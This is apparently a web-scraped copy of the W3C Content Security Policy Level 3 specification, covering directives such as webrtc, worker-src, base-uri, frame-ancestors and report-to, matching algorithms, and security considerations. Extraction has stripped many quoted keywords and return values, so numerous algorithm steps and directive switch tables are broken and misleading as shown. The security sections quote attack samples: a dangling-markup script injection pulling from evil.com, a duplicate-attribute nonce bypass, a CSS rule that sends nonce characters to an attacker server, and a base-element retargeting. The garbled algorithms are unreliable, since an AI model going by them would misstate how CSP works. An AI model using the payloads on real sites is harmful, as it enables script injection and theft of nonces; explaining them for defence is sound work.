6.2. Other Directives
6.2.1. webrtc
The webrtc directive restricts whether connections may be established via WebRTC. The syntax for the directiveās name and value is described by the following ABNF:
directive-name = "webrtc" directive-value = "'allow'" / "'block'"
Content-Security-Policy: webrtc 'block'
No local ICE candidates will be surfaced, as no STUN checks will be made against the ICE server provided to the peer connection negotiated below; No connectivity-checks will be attempted to any remote candidates provided by JS; The connectionState will never transition to "connected" and instead transition directly from its initial state of "new" to "failed" shortly. Attempts to pc.restartIce() will repeat this outcome.
< script > const iceServers= [{ urls: "stun:stun.l.google.com:19302" }]; const pc= new RTCPeerConnection({ iceServers}); pc. createDataChannel( "" ); const io= new WebSocket( 'ws://example.com:8080' ); pc. onicecandidate= ({ candidate}) => io. send({ candidate}); pc. onnegotiationneeded= async () => { await pc. setLocalDescription(); io. send({ description: pc. localDescription}); }; io. onmessage= async ({ data: { description, candidate}}) => { if ( description) { await pc. setRemoteDescription( description); if ( description. type== "offer" ) { await pc. setLocalDescription(); io. send({ description: pc. localDescription}); } } else if ( candidate) await pc. addIceCandidate( candidate); }; </ script > webrtc
Pre-connect Check
This directiveās webrtc pre-connect check is as follows:
If this directiveās value contains a single item which is an ASCII case-insensitive match for the string "
", return "Allowed
". -
Return "
6.2.2. worker-src
The worker-src directive restricts the URLs which may be loaded as
a Worker
, SharedWorker
, or ServiceWorker
. The syntax for the
directiveās name and value is described by the following ABNF:
directive-name = "worker-src" directive-value = serialized-source-list
Content-Security-Policy: worker-src https://example.com/
Fetches for the following code will return a network errors, as the URL
provided do not match worker-src
's source list:
< script > var blockedWorker= new Worker( "data:application/javascript,..." ); blockedWorker= new SharedWorker( "https://example.org/" ); navigator. serviceWorker. register( 'https://example.org/sw.js' ); </ script > worker-src
Pre-request Check
This directiveās pre-request check is as follows:
Given a request (request) and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
". worker-src
Post-request Check
This directiveās post-request check is as follows:
Given a request (request), a response (response), and a policy (policy):
Let name be the result of executing Ā§āÆ6.8.1 Get the effective directive for request on request.
If the result of executing Ā§āÆ6.8.4 Should fetch directive execute on name,
and policy is "No
", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, this directiveās value, and policy, is "
Does Not Match
", return "Blocked
". -
Return "
6.3. Document Directives
The following directives govern the properties of a document or worker environment to which a policy applies.
6.3.1. base-uri
The base-uri directive restricts the URL
s which can be used in
a Document
's base
element. The syntax for the directiveās name and
value is described by the following ABNF:
directive-name = "base-uri" directive-value = serialized-source-list
The following algorithm is called during HTMLās set the frozen base url algorithm in order to monitor and enforce this directive: Is base allowed for document?
Given a URL
(base), and a Document
(document), this algorithm
returns "Allowed
" if base may be used as the value of a base
elementās href
attribute, and "Blocked
" otherwise:
For each policy of documentās global objectās csp list:
Let source list be
. -
If a directive whose name is "
" is present in policyās directive set, set source list to that directiveās value. -
If source list is
, skip to the next policy. -
If the result of executing Ā§āÆ6.7.2.5 Does url match source list in origin with redirect count? on base, source list, policyās self-origin, and
is "Does Not Match
Let violation be the result of executing Ā§āÆ2.4.1 Create a violation object for global, policy, and directive on documentās global object, policy, and "
". -
Set violationās resource to "
". -
Execute Ā§āÆ5.5 Report a violation on violation.
If policyās disposition is "
", return "Blocked
Note: We compare against the fallback base URL in order to deal correctly with things like an iframe
which has been sandboxed into an opaque origin. -
Return "
6.3.2. sandbox
The sandbox directive specifies an HTML sandbox policy which the
user agent will apply to a resource, just as though it had been included in
an iframe
with a sandbox
The directiveās syntax is described by the following ABNF grammar, with
the additional requirement that each token value MUST be one of the
keywords defined by HTML specification as allowed values for the iframe
attribute [HTML].
directive-name = "sandbox" directive-value = "" / token *( required-ascii-whitespace token )
This directive has no reporting requirements; it will be ignored entirely when
delivered in a Content-Security-Policy-Report-Only
header, or within
a meta
element. sandbox
This directiveās initialization algorithm is
responsible for checking whether a worker is allowed to run according
to the sandbox
values present in its policies as follows:
Note: The sandbox directive is also responsible for adjusting a Document
's active sandboxing flag set via the CSP-derived sandboxing flags.
Given a Document
or global object (context) and a policy (policy):
If policyās disposition is not "
", or context is not aWorkerGlobalScope
, then abort this algorithm. -
Let sandboxing flag set be a new sandboxing flag set.
Parse a sandboxing directive using this directiveās value as the input, and sandboxing flag set as the output.
If sandboxing flag set contains either the sandboxed scripts browsing context flag or the sandboxed origin browsing context flag flags, return "
".Note: This will need to change if we allow Workers to be sandboxed into unique origins, which seems like a pretty reasonable thing to do.
Return "
6.4. Navigation Directives
6.4.1. form-action
The form-action directive restricts the URL
s which can be used
as the target of a form submissions from a given context. The directiveās syntax is
described by the following ABNF grammar:
directive-name = "form-action" directive-value = serialized-source-list form-action
Pre-Navigation Check
Given a request (request), a string navigation type ("form-submission
" or
"), and a policy (policy) this algorithm returns "Blocked
" if a form
submission violates the form-action
directiveās constraints, and "Allowed
otherwise. This constitutes the form-action
directiveās pre-navigation check:
Assert: policy is unused in this algorithm.
If navigation type is "
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, this directiveās value, and a policy, is "
Does Not Match
", return "Blocked
Return "
6.4.2. frame-ancestors
The frame-ancestors directive restricts the URL
s which can
embed the resource using frame
, iframe
, object
, or embed
. Resources
can use this directive to avoid many UI Redressing [UISECURITY] attacks, by
avoiding the risk of being embedded into potentially hostile contexts.
The directiveās syntax is described by the following ABNF grammar:
directive-name = "frame-ancestors" directive-value = ancestor-source-list ancestor-source-list = ( ancestor-source *( required-ascii-whitespace ancestor-source) ) / "'none'" ancestor-source = scheme-source / host-source / "'self'"
The frame-ancestors
directive MUST be ignored when contained in a policy
declared via a meta
Note: The frame-ancestors
directiveās syntax is similar to a source
list, but frame-ancestors
will not fall back to the default-src
directiveās value if one is specified. That is, a policy that declares default-src 'none'
will still allow the resource to be embedded by anyone. frame-ancestors
Navigation Response Check
Given a request (request), a string navigation type ("form-submission
" or "other
"), a response (navigation response) a navigable (target),
a string check type ("source
" or "response
"), and a policy (policy) this algorithm returns "Blocked
" if one or
more of the ancestors of target violate the frame-ancestors
delivered with the response, and "Allowed
" otherwise. This constitutes the frame-ancestors
directiveās navigation response check:
Assert: request, navigation response, and navigation type, are unused from this point forward in this algorithm, as
is concerned only with navigation responseās frame-ancestors directive. -
If check type is "
", return "Allowed
".Note: The 'frame-ancestors' directive is relevant only to the target navigable and it has no impact on the requestās context.
If target is not a child navigable, return "
". -
Let current be target.
While current is a child navigable:
Let document be currentās container document.
Let origin be the result of executing the URL parser on the ASCII serialization of documentās origin.
If Ā§āÆ6.7.2.5 Does url match source list in origin with redirect count? returns
Does Not Match
when executed upon origin, this directiveās value, policyās self-origin, and0
, return "Blocked
". -
Set current to documentās node navigable.
Return "
". Relation to ``X-Frame-Options
`This directive is similar to the ``
response header. The X-Frame-Options
source expression is roughly equivalent to that
headerās `DENY
`, and 'self'
to that headerās `SAMEORIGIN
`. [HTML]
In order to allow backwards-compatible deployment, the frame-ancestors
directive obsoletes the
` header. If a resource is delivered with
a policy that includes a directive named X-Frame-Options
and whose disposition is
", then the ``
` header will be
ignored, per HTMLās processing model.X-Frame-Options
6.5. Reporting Directives
Various algorithms in this document hook into the reporting process by constructing a violation object via Ā§āÆ2.4.2 Create a violation object for request, and policy. or Ā§āÆ2.4.1 Create a violation object for global, policy, and directive, and passing that object to Ā§āÆ5.5 Report a violation to deliver the report.
6.5.1. report-uri
directive is deprecated. Please use the report-to
directive instead. If the latter directive is present,
this directive will be ignored. To ensure backwards compatibility, we
suggest specifying both, like this:
Content-Security-Policy: ...; report-uri https://endpoint.com; report-to groupname
The report-uri
directive defines a set of endpoints to which csp violation reports will be sent when particular behaviors are prevented.
directive-name = "report-uri" directive-value = uri-reference *( required-ascii-whitespace uri-reference ) ; The uri-reference grammar is defined in Section 4.1 of RFC 3986.
The directive has no effect in and of itself, but only gains meaning in combination with other directives.
6.5.2. report-to
The report-to
directive defines a reporting
endpoint to which violation reports ought to be sent [REPORTING]. The
directiveās behavior is defined in Ā§āÆ5.5 Report a violation. The directiveās name
and value are described by the following ABNF:
directive-name = "report-to" directive-value = token
6.6. Directives Defined in Other Documents
This document defines a core set of directives, and sets up a framework for modular extension by other specifications. At the time this document was produced, the following stable documents extend CSP:
[MIX] defines
Extensions to CSP MUST register themselves via the process outlined in [RFC7762]. In particular, note the criteria discussed in Section 4.2 of that document.
New directives SHOULD use the pre-request check, post-request check, and initialization hooks in order to integrate themselves into Fetch and HTML.
6.7. Matching Algorithms
6.7.1. Script directive checks Script directives pre-request check
Given a request (request), a directive (directive), and a policy (policy):
If requestās destination is script-like:
If the result of executing Ā§āÆ6.7.2.2 Does nonce match source list? on requestās cryptographic nonce metadata and this directiveās value is "
", return "Allowed
". -
Let integrity expressions be the set of source expressions in directiveās value that match the hash-source grammar.
If integrity expressions is not empty:
Let integrity sources be the result of executing the algorithm defined in SRI Ā§āÆ3.3.3 Parse metadata. on requestās integrity metadata. [SRI]
If integrity sources is "
no metadata
" or an empty set, skip the remaining substeps. -
Let bypass due to integrity match be
. -
For each source of integrity sources:
If directiveās value does not contain a source expression whose hash-algorithm is an ASCII case-insensitive match for sourceās hash-algorithm, and whose base64-value is identical to sourceās
, then set bypass due to integrity match tofalse
If bypass due to integrity match is
, return "Allowed
Note: Here, we verify only that the request contains a set of integrity metadata which is a subset of the hash-source source expressions specified by directive. We rely on the browserās enforcement of Subresource Integrity [SRI] to block non-matching resources upon response.
If directiveās value contains a source expression that is an ASCII case-insensitive match for the "
" keyword-source:-
If the requestās parser metadata is "parser-inserted", return "
".Otherwise, return "
".Note: "
" is explained in more detail in Ā§āÆ8.2 Usage of "'strict-dynamic'".
If the result of executing Ā§āÆ6.7.2.3 Does request match source list? on request, directiveās value, and policy, is "
Does Not Match
", return "Blocked
Return "
". Script directives post-request check
This directiveās post-request check is as follows:
Given a request (request), a response (response), a directive (directive), and a policy (policy):
If requestās destination is script-like:
If the result of executing Ā§āÆ6.7.2.2 Does nonce match source list? on requestās cryptographic nonce metadata and this directiveās value is "
", return "Allowed
". -
If directiveās value contains "
", and requestās parser metadata is not "parser-inserted", return "Allowed
". -
If the result of executing Ā§āÆ6.7.2.4 Does response to request match source list? on response, request, directiveās value, and policy, is "
Does Not Match
", return "Blocked
Return "
6.7.2. URL Matching Does request violate policy?
Given a request (request) and a policy (policy), this
algorithm returns the violated directive if the request violates the
policy, and "Does Not Violate
" otherwise.
Let violates be "
Does Not Violate
". -
For each directive of policy:
Let result be the result of executing directiveās pre-request check on request and policy.
If result is "
", then let violates be directive.
Return violates. Does nonce match source list?
Given a requestās cryptographic nonce metadata (nonce) and a source list (source list), this algorithm returns
" if the nonce matches one or more source expressions in the list,
and "Does Not Match
" otherwise:
Assert: source list is not
. -
If nonce is the empty string, return "
Does Not Match
". -
For each expression of source list:
If expression matches the
grammar, and nonce is identical to expressionāsbase64-value
part, return "Matches
Return "
Does Not Match
". Does request match source list?
Given a request (request), a source list (source list), and a policy (policy), this algorithm returns the result of executing Ā§āÆ6.7.2.5 Does url match source list in origin with redirect count? on requestās current url, source list, policyās self-origin, and requestās redirect count.
Note: This is generally used in directives' pre-request check algorithms to verify that a given request is reasonable. Does response to request match source list?
Given a request (request), and a source list (source list), and a policy (policy), this algorithm returns the result of executing Ā§āÆ6.7.2.5 Does url match source list in origin with redirect count? on responseās url, source list, policyās self-origin, and requestās redirect count.
Note: This is generally used in directives' post-request check algorithms to verify that a given response is reasonable. Does url match source list in origin with redirect count?
Given a URL
(url), a source list (source list), an origin (origin), and a number (redirect count), this
algorithm returns "Matches
" if the URL matches one or more source
expressions in source list, or "Does Not Match
" otherwise:
Assert: source list is not
. -
If source list is empty, return "
Does Not Match
". -
If source listās size is 1, and source list[0] is an ASCII case-insensitive match for the string "
", return "Does Not Match
".Note: An empty source list (that is, a directive without a value:
, as opposed toscript-src host1
) is equivalent to a source list containing'none'
, and will not match any URL.Note: The
keyword has no effect when other source expressions are present. That is, the list Ā«'none'
Ā» does not match any URL. A list consisting of Ā«'none'
Ā», on the other hand, would matchhttps://example.com/
. -
For each expression of source list:
If Ā§āÆ6.7.2.6 Does url match expression in origin with redirect count? returns "
" when executed upon url, expression, origin, and redirect count, return "Matches
Return "
Does Not Match
". Does url match expression in origin with redirect count?
Given a URL
(url), a source expression (expression), an origin (origin), and a number (redirect count), this algorithm
returns "Matches
" if url matches expression, and "Does Not Match
Note: origin is the origin of the resource relative to which the expression should be resolved. "'self'
", for instance, will have distinct
meaning depending on that bit of context.
If expression is the string "*", return "
" if one or more of the following conditions is met:-
urlās scheme is an HTTP(S) scheme.
Note: This logic means that in order to allow a resource from a non-HTTP(S) scheme, it has to be either explicitly specified (e.g.
default-src * data: custom-scheme-1: custom-scheme-2:
), or the protected resource must be loaded from the same scheme. -
If expression matches the
If expression has a
, and it does notscheme-part
match urlās scheme, return "Does Not Match
". -
If expression matches the
grammar, return "Matches
If expression matches the
If urlās
, return "Does Not Match
". -
If expression does not have a
, and originās scheme does notscheme-part
match urlās scheme, return "Does Not Match
".Note: As with
above, we allow schemelesshost-source
expressions to be upgraded from insecure schemes to secure schemes. -
If expressionās
does nothost-part
match urlāshost
, return "Does Not Match
". -
Let port-part be expressionās
if present, andnull
otherwise. -
If port-part does not
match urlās port and urlās scheme, return "Does Not Match
". -
If expression contains a non-empty
, and redirect count is 0, then:-
Let path be the resulting of joining urlās path on the U+002F SOLIDUS character (
). -
If expressionās
does notpath-part
match path, return "Does Not Match
Return "
If expression is an ASCII case-insensitive match for "
", return "Matches
" if one or more of the following conditions is met:-
origin is the same as urlās origin
is the same as urlāshost
, origināsport
and urlāsport
are either the same or the default ports for their respective schemes, and one or more of the following conditions is met:
Note: Like the
logic above, the "'self'
" matching algorithm allows upgrades to secure schemes when it is safe to do so. We limit these upgrades to endpoints running on the default port for a particular scheme or a port that matches the origin of the protected resource, as this seems sufficient to deal with upgrades that can be reasonably expected to succeed. -
Return "
Does Not Match
". scheme-part
An ASCII string scheme-part
matches another ASCII string if a CSP source expression that contained the first as a scheme-part
could potentially match a URL containing the latter as a scheme. For example, we say that "http" scheme-part
matches "https".
Note: The matching relation is asymmetric. For example, the source expressions https:
and https://example.com/
do not match the URL http://example.com/
. We always allow a
secure upgrade from an explicitly insecure expression. script-src http:
is treated as equivalent
to script-src http: https:
, script-src http://example.com
to script-src http://example.com https://example.com
, and connect-src ws:
to connect-src ws: wss:
More formally, two ASCII strings (A and B) are said to scheme-part
match if the
following algorithm returns "Matches
If one of the following is true, return "
A is an ASCII case-insensitive match for B.
A is an ASCII case-insensitive match for "
", and B is an ASCII case-insensitive match for "https
". -
A is an ASCII case-insensitive match for "
", and B is an ASCII case-insensitive match for "wss
", "http
", or "https
". -
A is an ASCII case-insensitive match for "
", and B is an ASCII case-insensitive match for "https
Return "
Does Not Match
". host-part
An ASCII string host-part
matches another ASCII
string if a CSP source expression that contained the first as a host-part
potentially match a URL containing the latter as a host. For example, we say that
"www.example.com" host-part matches "www.example.com".
More formally, two ASCII strings (A and B) are said to host-part
match if the
following algorithm returns "Matches
Note: The matching relation is asymmetric. That is, A matching B does not
mean that B will match A. For example, *.example.com
matches www.example.com
, but www.example.com
does not host-part
match *.example.com
If the first character of A is an U+002A ASTERISK character (
Let remaining be the result of removing the leading ("*") from A.
If remaining (including the leading U+002E FULL STOP character (
)) is an ASCII case-insensitive match for the rightmost characters of B, then return "Matches
". Otherwise, return "Does Not Match
If A is not an ASCII case-insensitive match for B, return "
Does Not Match
". -
If A matches the IPv4address rule from [RFC3986], and is not "
"; or if A is an IPv6 address, return "Does Not Match
".Note: A future version of this specification may allow literal IPv6 and IPv4 addresses, depending on usage and demand. Given the weak security properties of IP addresses in relation to named hosts, however, authors are encouraged to prefer the latter whenever possible.
Return "
". port-part
An ASCII string (port A) port-part
matches two other ASCII
strings (port B and scheme B) if a CSP source expression that contained the first as a port-part
could potentially match a URL containing the latter as port and scheme. For example, "80" port-part
matches matches "80"/"http".
If port A is empty:
If port B is the default port for scheme B, return "
". Otherwise, return "Does Not Match
If port A is equal to "*", return "
". -
If port A is identical to port B, return "
". -
If port B is empty:
If port A is the default port for scheme B, return "
". Otherwise, return "Does not Match
Return "
Does Not Match
". path-part
An ASCII string (path A) path-part
matches another ASCII string (path B) if a CSP source expression that contained the first as a path-part
could potentially match a URL containing the latter as a path.
For example, we say that "/subdirectory/" path-part
matches "/subdirectory/file".
Note: The matching relation is asymmetric. That is, path A matching path B does not mean that path B will match path A.
If path A is empty, return "
". -
If path A consists of one character that is equal to the U+002F SOLIDUS character (
) and path B is empty, return "Matches
". -
Let exact match be
if the final character of path A is the U+002F SOLIDUS character (/
), andtrue
otherwise. -
Let path list A and path list B be the result of strictly splitting path A and path B respectively on the U+002F SOLIDUS character (
). -
If path list A has more items than path list B, return "
Does Not Match
". -
If exact match is
, and path list A does not have the same number of items as path list B, return "Does Not Match
". -
If exact match is
Assert: the final item in path list A is the empty string.
Remove the final item from path list A.
For each piece A of path list A:
Let piece B be the next item in path list B.
Let decoded piece A be the percent-decoding of piece A.
Let decoded piece B be the percent-decoding of piece B.
If decoded piece A is not decoded piece B, return "
Does Not Match
Return "
6.7.3. Element Matching Algorithms Is element nonceable?
Given an Element
(element), this algorithm returns "Nonceable
" if
a nonce-source
expression can match the element (as discussed
in Ā§āÆ7.2 Nonce Hijacking), and "Not Nonceable
" if such expressions
should not be applied.
If element does not have an attribute named "
", return "Not Nonceable
". -
If element is a
element, then for each attribute of elementās attribute list:-
If attributeās name is an ASCII case-insensitive match for the string "
" or the string "<style
", return "Not Nonceable
". -
If attributeās value contains an ASCII case-insensitive match the string "
" or the string "<style
", return "Not Nonceable
If element had a duplicate-attribute parse error during tokenization, return "
Not Nonceable
".We need some sort of hook in HTML to record this error if weāre planning on using it here. [Issue #whatwg/html#3257]
Return "
This processing is meant to mitigate the risk
of dangling markup attacks that steal the nonce from an existing element
in order to load injected script. It is fairly expensive, however, as it
requires that we walk through all attributes and their values in order to
determine whether the script should execute. Here, we try to minimize the
impact by doing this check only for script
elements when a nonce is
present, but we should probably consider this algorithm as "at risk" until
we know its impact. [Issue #w3c/webappsec-csp#98] Does a source list allow all inline behavior for type?
A source list allows all inline behavior of a given type if it contains the keyword-source
expression 'unsafe-inline'
, and does not override that
expression as described in the following algorithm:
Given a source list (list) and a string (type), the following
algorithm returns "Allows
" if all inline content of a given type is
allowed and "Does Not Allow
" otherwise.
Let allow all inline be
. -
For each expression of list:
If expression matches the
grammar, return "Does Not Allow
". -
If type is "
", "script attribute
" or "navigation
" and expression matches the keyword-source "'strict-dynamic'
", return "Does Not Allow
only applies to scripts, not other resource types. Usage is explained in more detail in Ā§āÆ8.2 Usage of "'strict-dynamic'". -
If expression is an ASCII case-insensitive match for the
", set allow all inline totrue
If allow all inline is
, return "Allows
". Otherwise, return "Does Not Allow
'unsafe-inline' http://a.com http://b.com 'unsafe-inline'
Source lists that do not allow all inline behavior due to
the presence of nonces and/or hashes, or absence of 'unsafe-inline
'sha512-321cba' 'nonce-abc' http://example.com 'unsafe-inline' 'nonce-abc'
Source lists that do not allow all inline behavior when type is
' or 'script attribute
' due to the presence of
', but allow all inline behavior otherwise:
'unsafe-inline' 'strict-dynamic' http://example.com 'strict-dynamic' 'unsafe-inline' Does element match source list for type and source?
Given an Element
(element), a source list (list), a string
(type), and a string (source), this algorithm returns "Matches
" or
"Does Not Match
Note: Regardless of the encoding of the document, source will be converted
to UTF-8
before applying any hashing algorithms.
If Ā§āÆ6.7.3.2 Does a source list allow all inline behavior for type? returns "
" given list and type, return "Matches
". -
If type is "
" or "style
", and Ā§āÆ6.7.3.1 Is element nonceable? returns "Nonceable
" when executed upon element:-
For each expression of list:
If expression matches the
grammar, and element has anonce
attribute whose value is expressionāsbase64-value
part, return "Matches
Note: Nonces only apply to inline
and inlinestyle
, not to attributes of either element or tojavascript:
navigations. -
Let unsafe-hashes flag be
. -
For each expression of list:
If expression is an ASCII case-insensitive match for the
", set unsafe-hashes flag totrue
. Break out of the loop.
If type is "
" or "style
", or unsafe-hashes flag istrue
Set source to the result of executing UTF-8 encode on the result of executing JavaScript string converting on source.
For each expression of list:
If expression matches the
Let algorithm be
. -
If expressionās
part is an ASCII case-insensitive match for "sha256", set algorithm to SHA-256. -
If expressionās
part is an ASCII case-insensitive match for "sha384", set algorithm to SHA-384. -
If expressionās
part is an ASCII case-insensitive match for "sha512", set algorithm to SHA-512. -
If algorithm is not
Let actual be the result of base64 encoding the result of applying algorithm to source.
Let expected be expressionās
part, with all '-
' characters replaced with '+
', and all '_
' characters replaced with '/
'.Note: This replacement normalizes hashes expressed in base64url encoding into base64 encoding for matching.
If actual is identical to expected, return "
Note: Hashes apply to inline
and inlinestyle
. If the "'unsafe-hashes'
" source expression is present, they will also apply to event handlers, style attributes andjavascript:
navigations. -
Return "
Does Not Match
6.8. Directive Algorithms
6.8.1. Get the effective directive for request
Each fetch directive controls a specific destination of request. Given
a request (request), the following algorithm returns either null
or the name of the requestās effective directive:
If requestās initiator is "
" or its destination is "", returnconnect-src
. -
If requestās initiator is "
" or "prerender
", returnprefetch-src
. -
Switch on requestās destination, and execute the associated steps:
- "
" -
- "
"- "
" - "
- "
"- "
" - "
- "
"- "
"- "
" - "
- "
" -
- "
" -
- "
" -
- "
"- "
"- "
"- "
" - "
- "
"- "
"- "
" - "
- "
" -
- "
6.8.2. Get the effective directive for inline checks
Given a string (type), this algorithm returns the name of the effective directive.
Note: While the effective directive is only defined for requests, in this algorithm it is used similarly to mean the directive that is most relevant to a particular type of inline check.
Switch on type:
- "
"- "
" - "
- "
script attribute
" -
- "
" -
- "
style attribute
" -
- "
6.8.3. Get fetch directive fallback list
Will return an ordered set of the fallback directives for a specific directive. The returned ordered set is sorted from most relevant to least relevant and it includes the effective directive itself.
Given a string (directive name):
Switch on directive name:
- "
" -
<< "script-src-elem", "script-src", "default-src" >>
- "
" -
<< "script-src-attr", "script-src", "default-src" >>
- "
" -
<< "style-src-elem", "style-src", "default-src" >>
- "
" -
<< "style-src-attr", "style-src", "default-src" >>
- "
" -
<< "worker-src", "child-src", "script-src", "default-src" >>
- "
" -
<< "connect-src", "default-src" >>
- "
" -
<< "manifest-src", "default-src" >>
- "
" -
<< "prefetch-src", "default-src" >>
- "
" -
<< "object-src", "default-src" >>
- "
" -
<< "frame-src", "child-src", "default-src" >>
- "
" -
<< "media-src", "default-src" >>
- "
" -
<< "font-src", "default-src" >>
- "
" -
<< "img-src", "default-src" >>
- "
<< >>
6.8.4. Should fetch directive execute
This algorithm is used for fetch directives to decide whether a directive
should execute or defer to a different directive that is better suited.
For example: if the effective directive name is worker-src
(meaning that
we are currently checking a worker request), a default-src
should not execute if a worker-src
or script-src
directive exists.
Given a string (effective directive name), a string (directive name) and a policy (policy):
Let directive fallback list be the result of executing Ā§āÆ6.8.3 Get fetch directive fallback list on effective directive name.
For each fallback directive of directive fallback list:
If directive name is fallback directive, Return "
". -
If policy contains a directive whose name is fallback directive, Return "
Return "
7. Security and Privacy Considerations
7.1. Nonce Reuse
Nonces override the other restrictions present in the directive in which theyāre delivered. It is critical, then, that they remain unguessable, as bypassing a resourceās policy is otherwise trivial.
If a server delivers a nonce-source expression as part of a policy, the server MUST generate a unique value each time it transmits a policy. The generated value SHOULD be at least 128 bits long (before encoding), and SHOULD be generated via a cryptographically secure random number generator in order to ensure that the value is difficult for an attacker to predict.
Note: Using a nonce to allow inline script or style is less secure than not using a nonce, as nonces override the restrictions in the directive in which they are present. An attacker who can gain access to the nonce can execute whatever script they like, whenever they like. That said, nonces provide a substantial improvement over 'unsafe-inline' when layering a content security policy on top of old code. When considering 'unsafe-inline', authors are encouraged to consider nonces (or hashes) instead.
7.2. Nonce Hijacking
7.2.1. Dangling markup attacks
Dangling markup attacks such as those discussed in [FILEDESCRIPTOR-2015] can be used to repurpose a pageās legitimate nonces for injections. For
example, given an injection point before a script
< p > Hello, [INJECTION POINT]</ p > < script nonce = abc src = /good.js ></ script >
If an attacker injects the string "<script src='https://evil.com/evil.js'
then the browser will receive the following:
< p > Hello,< script src = 'https://evil.com/evil.js' </p > < script nonce= abc src= /good.js></ script >
It will then parse that code, ending up with a script
element with a src
attribute pointing to a malicious payload, an attribute named </p>
an attribute named "<script
", a nonce
attribute, and a
second src
attribute which is helpfully discarded as duplicate by the parser.
The Ā§āÆ6.7.3.1 Is element nonceable? algorithm attempts to mitigate this specific
attack by walking through script
or style
element attributes, looking for the
string "<script
" or "<style
" in their names or values.
User-agents must pay particular attention when implementing this algorithm to not ignore duplicate attributes. If an element has a duplicate attribute any instance of the attribute after the first one is ignored but in the Ā§āÆ6.7.3.1 Is element nonceable? algorithm, all attributes including the duplicate ones need to be checked.
Currently the HTML specās parsing algorithm removes this information before the Ā§āÆ6.7.3.1 Is element nonceable? algorithm can be run which makes it impossible to actually detect duplicate attributes. [Issue #whatwg/html#3257]
For the following example page:
Hello, [INJECTION POINT]< script nonce = abc src = /good.js ></ script >
The following injected string will use a duplicate attribute to attempt to bypass the Ā§āÆ6.7.3.1 Is element nonceable? algorithm check:
Hello,< script src = 'https://evil.com/evil.js' x = "" x = <script nonce = "abcd" src = /good.js ></ script >
7.2.2. Nonce exfiltration via content attributes
Some attacks on CSP rely on the ability to exfiltrate nonce data via various mechanisms that can read content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors values can be sent out to an attackerās server for reuse. Example:
script[ nonce=a] { background : url ( "https://evil.com/nonce?a" );}
The nonce
section talks about mitigating these types
of attacks by hiding the nonce from the elementās content attribute and
moving it into an internal slot. This is done to ensure that the nonce
value is exposed to scripts but not any other non-script channels.
7.3. Nonce Retargeting
Nonces bypass host-source expressions, enabling developers to load code from any
origin. This, generally, is fine, and desirable from the developerās perspective. However, if an
attacker can inject a base
element, then an otherwise safe page can be subverted when relative
URLs are resolved. That is, on https://example.com/
the following code will load https://example.com/good.js
< script nonce = abc src = /good.js ></ script >
However, the following will load https://evil.com/good.js
< base href = "https://evil.com" > < script nonce = abc src = /good.js ></ script >
To mitigate this risk, it is advisable to set an explicit base
element on every page, or to
limit the ability of an attacker to inject their own base
element by setting a base-uri
directive in your pageās policy. For example, base-uri 'none'
7.4. CSS Parsing
The style-src directive restricts the locations from which the protected resource can load styles. However, if the user agent uses a lax CSS parsing algorithm, an attacker might be able to trick the user agent into accepting malicious "stylesheets" hosted by an otherwise trustworthy origin.
These attacks are similar to the CSS cross-origin data leakage attack described by Chris Evans in 2009 [CSS-ABUSE]. User agents SHOULD defend against both attacks using the same mechanism: stricter CSS parsing rules for style sheets with improper MIME types.
7.5. Violation Reports
The violation reporting mechanism in this document has been designed to
mitigate the risk that a malicious web site could use violation reports to
probe the behavior of other servers. For example, consider a malicious web
site that allows https://example.com
as a source of images. If the
malicious site attempts to load https://example.com/login
as an image, and
the example.com
server redirects to an identity provider (e.g. identityprovider.example.net
), CSP will block the request. If violation
reports contained the full blocked URL, the violation report might contain
sensitive information contained in the redirected URL, such as session
identifiers or purported identities. For this reason, the user agent includes
only the URL of the original request, not the redirect target.
Note also that violation reports should be considered attacker-controlled data. Developers who
wish to collect violation reports in a dashboard or similar service should be careful to properly
escape their content before rendering it (and should probably themselves use CSP to further
mitigate the risk of injection). This is especially true for the "script-sample
" property of
violation reports, and the sample
property of SecurityPolicyViolationEvent
, which are both completely attacker-controlled strings.
7.6. Paths and Redirects
To avoid leaking path information cross-origin (as discussed
in Egor Homakovās Using Content-Security-Policy for Evil),
the matching algorithm ignores the path component of a source
expression if the resource being loaded is the result of a
redirect. For example, given a page with an active policy of img-src example.com example.org/path
Directly loading
would fail, as it doesnāt match the policy. -
Directly loading
would pass, as it matchesexample.com
. -
Assuming that
delivered a redirect response pointing tohttps://example.org/not-path
, the load would succeed, as the initial URL matchesexample.com
, and the redirect target matchesexample.org/path
if we ignore its path component.
This restriction reduces the granularity of a documentās policy when redirects are in play, a necessary compromise to avoid brute-forced information leaks of this type.
The relatively long thread "Remove paths from CSP?" from public-webappsec@w3.org has more detailed discussion around alternate proposals.
7.7. Secure Upgrades
To mitigate one variant of history-scanning attacks like Yan Zhuās Sniffly, CSP will not allow pages to lock
themselves into insecure URLs via policies like script-src http://example.com
. As described in Ā§āÆ6.7.2.7 scheme-part matching, the scheme portion of a source expression will always allow upgrading to a
secure variant.
7.8. CSP Inheriting to avoid bypasses
Documents loaded from local schemes will inherit a copy of the
policies in the source document. The goal is to ensure that a page canāt
bypass its policy by embedding a frame or opening a new window containing
content that is entirely under its control (srcdoc
documents, blob:
or data:
URLs, about:blank
documents that can be manipulated via document.write()
, etc).
in the pageās execution context by simply embedding a srcdoc
< iframe srcdoc = "<script>alert(1);</script>" ></ iframe >
Note that we create a copy of the CSP list which
means that the new Document
's CSP list is a
snapshot of the relevant policies at its creation time. Modifications in the CSP list of the new Document
wonāt affect the
source Document
's CSP list or vice-versa.
tag of the iframe. The image outside the
iframe will load (assuming the main page policy does not block it) since the
policy inserted in the iframe will not affect it.
< iframe srcdoc = '<meta http-equiv="Content-Security-Policy" content="img-src example.com;"> <img src="not-example.com/image">' ></ iframe > < img src = "not-example.com/image" >
8. Authoring Considerations
8.1. The effect of multiple policies
This section is not normative.
The above sections note that when multiple policies are present, each must be
enforced or reported, according to its type. An example will help clarify how
that ought to work in practice. The behavior of an XMLHttpRequest
might seem unclear given a site that, for whatever reason, delivered the
following HTTP headers:
Content-Security-Policy: default-src 'self' http://example.com http://example.net; connect-src 'none'; Content-Security-Policy: connect-src http://example.com/; script-src http://example.com/
